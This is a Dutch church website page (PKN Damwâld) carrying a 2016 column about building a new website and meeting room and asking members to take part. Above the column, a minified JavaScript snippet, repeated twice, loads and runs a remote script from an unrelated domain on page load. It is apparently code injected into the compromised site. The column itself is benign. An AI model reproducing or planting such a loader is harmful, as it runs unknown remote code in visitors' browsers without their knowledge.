;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bouwen is een werkwoord - PKN Damwâld

Bouwen is een werkwoord

Gepubliceerd op: vrijdag 30 september 2016

Er is een nieuwe website gebouwd. En we zijn er best blij mee! De kans om een nieuwe start te maken, om te bedenken wat er anders kan, en misschien anders moet, weer met een blanco pagina te beginnen.
Eerst hebben we een aantal sessies gehouden over de vorm en de inhoud. Andere websites bekeken, zowel christelijke als zakelijke, om een idee te krijgen en te kijken hoe het kan én hoe het niet moet. Teksten geschreven, een indeling bedacht. Mensen benaderd, en veel overleg gehad. Steeds maar weer puzzelen, schrijven, herschrijven en dan toch nog weer aanpassingen aanbrengen. Een hele klus, maar wel mooi, uitdagend en inspirerend.
Ook de Gereformeerde kerk heeft een nieuwe ontmoetingsruimte gekregen, ook daaraan is hard gebouwd. Slopen, breken, tekenen, berekenen, passen en meten. Maar het weten dat je het samen doet, en waarvoor je het doet, dát geeft energie! En wat is het mooi geworden, om trots op te zijn!
Maar nu het resultaat zichtbaar is, zijn we er nog niet, het begint nu pas!
De website vraagt om input, om verhalen, nieuwtjes, foto’s, reportages en geloofservaringen, die we kunnen delen. Om van te leren, van te genieten, of als hart onder de riem.
Dus heb je een idee, een leuke activiteit, een puzzel of een vraag: laat het ons weten! Wil je een keer iets delen, een foto, of een artikel? Of heb je hulp nodig, bij een club of doe-activiteit, wil je meehelpen? Geef een seintje, stuur een mail of trek ons aan de jas.
Want die website, en ook dat gebouw, is niets zonder jullie, zonder mensen met hun beleving, gebeden, muziek, helpende handen en inspiratie, zonder het bouwen aan de gemeente, aan onderlinge verbondenheid, aan geloof.
Bouwen is een werkwoord, dus: handen uit de mouwen!

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns